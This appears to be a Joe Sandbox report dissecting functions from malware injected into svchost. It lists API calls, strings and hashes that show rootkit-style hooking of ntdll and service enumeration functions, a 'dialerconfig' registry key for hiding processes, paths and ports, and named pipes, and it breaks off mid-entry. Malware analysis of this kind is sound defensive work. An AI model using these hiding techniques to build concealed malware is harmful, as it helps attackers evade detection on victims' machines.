Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: AFB1AD32210E988AFB64CF25C5587A9E3B6FB88B88F445416EE0953794DF38CF81E340

Function 00000233B91E7E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000233B91E7E8C
RtlCaptureContext.NTDLL ref: 00000233B91E7EB9
RtlLookupFunctionEntry.NTDLL ref: 00000233B91E7ED3
RtlVirtualUnwind.NTDLL ref: 00000233B91E7F14
IsDebuggerPresent.KERNEL32 ref: 00000233B91E7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000233B91E7F89
UnhandledExceptionFilter.KERNEL32 ref: 00000233B91E7F94

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 0abc4f6f92c9700a86a5656fb300c8574b29137d94a022c4a2243ef93fc35bf0
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 61313C72205B849AEB60DF60E8447EDB376F784788F44442ADA4E47BA9EF38C749D710

Function 00000233B91EB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000233B91EB585
RtlLookupFunctionEntry.NTDLL ref: 00000233B91EB59D
RtlVirtualUnwind.NTDLL ref: 00000233B91EB5D8
IsDebuggerPresent.KERNEL32 ref: 00000233B91EB611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000233B91EB61B
UnhandledExceptionFilter.KERNEL32 ref: 00000233B91EB626

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: b15de513117b3fbd8ad4ddb4077ef6b0541c794f816f3e0edce6387c66f33919
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: F5312A36214F848AEB60CF25E84439AB3B5F788798F544116EA9D43BA5DF3CC746CB00

Function 00000233B91EFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000233B91EFF67
WriteFile.KERNEL32 ref: 00000233B91F021E
WriteFile.KERNEL32 ref: 00000233B91F0270
GetLastError.KERNEL32 ref: 00000233B91F0372
GetLastError.KERNEL32 ref: 00000233B91F03D2

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 27385ab962e4d0a3935a0c51d8a2e59cf124c937009a3541d5ec376e754cc884
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 95E10272708A848AE700CF64D4883DDBBB6F3467CCF544116DE4A57B9ADA38CB1AD700

Function 00000233B91E1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000233B91E165B
HeapAlloc.KERNEL32 ref: 00000233B91E166A

Part of subcall function 00000233B91E1274: GetProcessHeap.KERNEL32 ref: 00000233B91E127A
Part of subcall function 00000233B91E1274: HeapAlloc.KERNEL32 ref: 00000233B91E1289
Part of subcall function 00000233B91E1274: GetProcessHeap.KERNEL32 ref: 00000233B91E12A3
Part of subcall function 00000233B91E1274: HeapAlloc.KERNEL32 ref: 00000233B91E12B4

RegOpenKeyExW.ADVAPI32 ref: 00000233B91E16DA
RegOpenKeyExW.ADVAPI32 ref: 00000233B91E1707
RegCloseKey.ADVAPI32 ref: 00000233B91E1721
RegOpenKeyExW.ADVAPI32 ref: 00000233B91E1741
RegCloseKey.ADVAPI32 ref: 00000233B91E175C
RegOpenKeyExW.ADVAPI32 ref: 00000233B91E177C
RegCloseKey.ADVAPI32 ref: 00000233B91E1797
RegOpenKeyExW.ADVAPI32 ref: 00000233B91E17B7
RegCloseKey.ADVAPI32 ref: 00000233B91E17D2
RegOpenKeyExW.ADVAPI32 ref: 00000233B91E17F2
RegCloseKey.ADVAPI32 ref: 00000233B91E180D
RegOpenKeyExW.ADVAPI32 ref: 00000233B91E182D
RegCloseKey.ADVAPI32 ref: 00000233B91E1848
RegOpenKeyExW.ADVAPI32 ref: 00000233B91E1868
RegCloseKey.ADVAPI32 ref: 00000233B91E1883
RegOpenKeyExW.ADVAPI32 ref: 00000233B91E18A3
RegCloseKey.ADVAPI32 ref: 00000233B91E18BE
RegCloseKey.ADVAPI32 ref: 00000233B91E18C8

Part of subcall function 00000233B91E12C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000233B91E1326
Part of subcall function 00000233B91E12C8: GetProcessHeap.KERNEL32 ref: 00000233B91E1334
Part of subcall function 00000233B91E12C8: HeapAlloc.KERNEL32 ref: 00000233B91E1345
Part of subcall function 00000233B91E12C8: RegEnumValueW.ADVAPI32 ref: 00000233B91E13A1
Part of subcall function 00000233B91E12C8: GetProcessHeap.KERNEL32 ref: 00000233B91E13E9
Part of subcall function 00000233B91E12C8: HeapAlloc.KERNEL32 ref: 00000233B91E13F7
Part of subcall function 00000233B91E12C8: GetProcessHeap.KERNEL32 ref: 00000233B91E141B
Part of subcall function 00000233B91E12C8: HeapFree.KERNEL32 ref: 00000233B91E1429
Part of subcall function 00000233B91E12C8: lstrlenW.KERNEL32 ref: 00000233B91E1432
Part of subcall function 00000233B91E12C8: GetProcessHeap.KERNEL32 ref: 00000233B91E1440
Part of subcall function 00000233B91E12C8: HeapAlloc.KERNEL32 ref: 00000233B91E144E

Strings

startup, xrefs: 00000233B91E16FD
udp, xrefs: 00000233B91E189C
tcp_local, xrefs: 00000233B91E1826
service_names, xrefs: 00000233B91E17EB
SOFTWARE\dialerconfig, xrefs: 00000233B91E16BA
process_names, xrefs: 00000233B91E1775
pid, xrefs: 00000233B91E173A
tcp_remote, xrefs: 00000233B91E1861
paths, xrefs: 00000233B91E17B0

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 385bb678e2f5ef439006fd4f6545624ad7afe9f026e6a5944696f81e976b9a92
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: B8712776710E598AEB10DF61E88879DA7B6FB84B8CF415122DA4D43A29DF3CC745D300

Function 00000233B91E12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000233B91E1326
GetProcessHeap.KERNEL32 ref: 00000233B91E1334
HeapAlloc.KERNEL32 ref: 00000233B91E1345
RegEnumValueW.ADVAPI32 ref: 00000233B91E13A1

Part of subcall function 00000233B91E1554: StrCmpIW.SHLWAPI ref: 00000233B91E1585

GetProcessHeap.KERNEL32 ref: 00000233B91E13E9
HeapAlloc.KERNEL32 ref: 00000233B91E13F7
GetProcessHeap.KERNEL32 ref: 00000233B91E141B
HeapFree.KERNEL32 ref: 00000233B91E1429
lstrlenW.KERNEL32 ref: 00000233B91E1432
GetProcessHeap.KERNEL32 ref: 00000233B91E1440
HeapAlloc.KERNEL32 ref: 00000233B91E144E
StrCpyW.SHLWAPI ref: 00000233B91E1470
GetProcessHeap.KERNEL32 ref: 00000233B91E1485
HeapFree.KERNEL32 ref: 00000233B91E1493

Strings

d, xrefs: 00000233B91E1365

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 06825d1104553bdcfc83df706edaaa002c36385b352286567ed10300bee56f63
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: D0516D72214B4897EB14DF62E54839AB3B2F789BC8F448125DA4A47B19DF3CC356D700

Function 00000233B91E1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000233B91E1EBF

Part of subcall function 00000233B91E2174: GetModuleHandleA.KERNEL32 ref: 00000233B91E218C
Part of subcall function 00000233B91E2174: GetProcAddress.KERNEL32 ref: 00000233B91E219D

Part of subcall function 00000233B91E5C10: GetCurrentThreadId.KERNEL32 ref: 00000233B91E5C4B

Strings

ntdll.dll, xrefs: 00000233B91E1ECD
NtResumeThread, xrefs: 00000233B91E1F02
NtQueryDirectoryFile, xrefs: 00000233B91E1F1F
NtEnumerateValueKey, xrefs: 00000233B91E1F76
EnumServicesStatusExW, xrefs: 00000233B91E1FB1, 00000233B91E1FD2
NtEnumerateKey, xrefs: 00000233B91E1F59
NtQueryDirectoryFileEx, xrefs: 00000233B91E1F3C
EnumServiceGroupW, xrefs: 00000233B91E1F90
NtQuerySystemInformation, xrefs: 00000233B91E1EE5
NtDeviceIoControlFile, xrefs: 00000233B91E1FF6
advapi32.dll, xrefs: 00000233B91E1F97, 00000233B91E1FB8
sechost.dll, xrefs: 00000233B91E1FD9

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: d57bdacc79a52458521054cb58cb944eefa9217334dd7e94a3651236c608c921
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 25319464201D4EA8FF08EF64E8697D4A333B74834CFC65923A52A03166AE7C874DF390

Function 00000233B91E23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000233B91E2405
GetCurrentProcessId.KERNEL32 ref: 00000233B91E240F

Part of subcall function 00000233B91E19AC: OpenProcess.KERNEL32 ref: 00000233B91E19CA
Part of subcall function 00000233B91E19AC: IsWow64Process.KERNEL32 ref: 00000233B91E19E0
Part of subcall function 00000233B91E19AC: CloseHandle.KERNEL32 ref: 00000233B91E19FB

CreateFileW.KERNEL32 ref: 00000233B91E2468
WriteFile.KERNEL32 ref: 00000233B91E2490
ReadFile.KERNEL32 ref: 00000233B91E24AF
CloseHandle.KERNEL32 ref: 00000233B91E24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 00000233B91E243F
\\.\pipe\dialerchildproc64, xrefs: 00000233B91E2438

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: da98e78401e48ad0ba5d4a6c3353c9b8dd0e15dfefb9d4f0b274d46a8bd6d44c
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: AF213E36614B4887FB10CB25F55875AB7B2F789BE8F504215EA5A02BA9DF3CC349DB00

Function 00000233B91E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000233B91E10AB
RegEnumValueW.ADVAPI32 ref: 00000233B91E110E
GetProcessHeap.KERNEL32 ref: 00000233B91E1155
HeapAlloc.KERNEL32 ref: 00000233B91E1163
GetProcessHeap.KERNEL32 ref: 00000233B91E1187
HeapFree.KERNEL32 ref: 00000233B91E1195

Strings

d, xrefs: 00000233B91E10CE

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 2515c5ebc3a310ba4926e21bd8a478f2ced8a10e0365229c90d24adcd3d75228
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 07414F73614B849BE764CF61E4487AAB7B2F389788F008125DB8A07A58DF3CD755DB00

Function 00000233B91E75F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000233B91E7618
__scrt_acquire_startup_lock.LIBCMT ref: 00000233B91E766A
_RTC_Initialize.LIBCMT ref: 00000233B91E7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000233B91E76BE
__scrt_release_startup_lock.LIBCMT ref: 00000233B91E76E9

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 3bd795fee3cb4abfdb0ca35dcca152d0f04712540c42c7164381b373a026a11c
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 9B81D421B00A4D8EFA54EB25A84D7A9E2F3B79578CF044415AA05877B7DB3CCB46B720

Function 00000233B91B69F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000233B91B6A18
__scrt_acquire_startup_lock.LIBCMT ref: 00000233B91B6A6A
_RTC_Initialize.LIBCMT ref: 00000233B91B6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000233B91B6ABE
__scrt_release_startup_lock.LIBCMT ref: 00000233B91B6AE9

Memory Dump Source

Source File: 0000001F.00000002.2676152738.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91b0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: faed10efcef39fe0567f547df4a8ab7fe71adef5805ac5b3be5042784372e532
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 8381042170064186FB50EB2AD99E359E7F3EB657DCF044425EA08477A6DB3DCB46B300

Function 00000233B91E9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00000233B91E9889
GetLastError.KERNEL32 ref: 00000233B91E9897
LoadLibraryExW.KERNEL32 ref: 00000233B91E98C1
FreeLibrary.KERNEL32 ref: 00000233B91E9907
GetProcAddress.KERNEL32 ref: 00000233B91E9913

Strings

api-ms-, xrefs: 00000233B91E98A9

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: bd8b867fa0a9904aae1573c0634913861ac86c05a09fcabf3f508df9bb118e84
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: AF31A531212F5C99EE15DF02A808799B3B6F709BA8F190525ED2D47396DF3CC7459300

Function 00000233B91F1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 00000233B91F1BCD
GetLastError.KERNEL32 ref: 00000233B91F1BD9
CloseHandle.KERNEL32 ref: 00000233B91F1BF1
CreateFileW.KERNEL32 ref: 00000233B91F1C1C
WriteConsoleW.KERNEL32 ref: 00000233B91F1C3B

Strings

CONOUT$, xrefs: 00000233B91F1BFD

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: beb47e064eb30cb0f01d5addea3dbb74978c31761469c8c82f45067a1a25db8a
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 94119D22314B8486E750CB42E858319A2B1F388FE8F044225EA5E87796CF3CCB059744

Function 00000233B91E5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000233B91E5C4B
GetThreadContext.KERNEL32 ref: 00000233B91E5DB5

Part of subcall function 00000233B91E5A40: GetCurrentThreadId.KERNEL32 ref: 00000233B91E5A44

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 4e3a305282de7be9a0df28d3c8758d5f90f08b6753399a97be31c1e4d92ea294
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 19D18C76208F8885EA70DB19E49435AB7B1F7C8B88F540116EA8D47BA9DF3CC741DB14

Function 00000233B91E30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000233B91E30D7
HeapAlloc.KERNEL32 ref: 00000233B91E30EA
StrCmpNIW.SHLWAPI ref: 00000233B91E316B
GetProcessHeap.KERNEL32 ref: 00000233B91E31D1
HeapFree.KERNEL32 ref: 00000233B91E31DF

Strings

dialer, xrefs: 00000233B91E3164

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 21cbdd76626658c98c5690967e044a1ada0a6cec65e94b7a1d784b7082d490e8
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: CE319321701F5987EB15DF56A8483A9E3B2FB44B88F0880249E4A07B59EF3CC7A2D700

Function 00000233B91E1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000233B91E1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000233B91E1A58
PathFindFileNameW.SHLWAPI ref: 00000233B91E1A67
lstrlenW.KERNEL32 ref: 00000233B91E1A73
StrCpyW.SHLWAPI ref: 00000233B91E1A86
CloseHandle.KERNEL32 ref: 00000233B91E1A94

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 368cd709e9d907e490b4da92160a3828b30eb4b9614c792b94554b2fb731e890
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 91012D25304A8596EB54DB12A45C7A9A3B2F788FC8F488435DE8A43755DE3CCB8A9740

Function 00000233B91E37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000233B91E37C8
GetCurrentProcess.KERNEL32 ref: 00000233B91E37D6
VirtualProtectEx.KERNEL32 ref: 00000233B91E37F8
GetCurrentProcess.KERNEL32 ref: 00000233B91E3819
VirtualProtectEx.KERNEL32 ref: 00000233B91E383A
TerminateThread.KERNEL32 ref: 00000233B91E3849

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 328aea5f1dddaa3518752123534ef8f18023ae7edaaea5f76992752a662cde63
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 40111B75711B4887EB24DB21E40DB5AE6B2BB48B89F040529D95907799EF3DC70A9700

Function 00000233B91E90F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000233B91E9103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000233B91E9198
RtlUnwindEx.NTDLL ref: 00000233B91E91E7

Strings

f, xrefs: 00000233B91E9116
csm, xrefs: 00000233B91E917E

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: e5443890949b902494fb70e9900ab9108573c15fd4694caf6c16831e1efa258b
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 64519C32611A098EEB18CF25E44CB69B3A7F754B9CF508120DA164778AEB7DCB81E700

Function 00000233B91E90D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000233B91E9103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000233B91E9198
RtlUnwindEx.NTDLL ref: 00000233B91E91E7

Strings

f, xrefs: 00000233B91E9116
csm, xrefs: 00000233B91E917E

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: f4d557f0e768a3ceb80de933c2a653a0eb85f9c477dce7c98d5c56cb46b2c9a9
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: C831BF32211A489AEB14DF11E84C759B7B6F744BDCF058114AE5B07796DB3CCB81D704

Function 00000233B91E1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000233B91E1AD8
StrCmpNIW.SHLWAPI ref: 00000233B91E1AF2
lstrlenW.KERNEL32 ref: 00000233B91E1B01
StrCpyW.SHLWAPI ref: 00000233B91E1B16

Strings

\\?\, xrefs: 00000233B91E1AE6

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 0ec5d0dfaaee9b13d0c0b6cdd5fd00442f0d470a339f1016968b9a8f88a7e002
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: FDF04F62304A4996EB60CB21F498399A772F744BCCF848031CA4946959EE2CC78DDB00

Function 00000233B91E3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000233B91E3222
StrCpyW.SHLWAPI ref: 00000233B91E3232
StrCatW.SHLWAPI ref: 00000233B91E323E
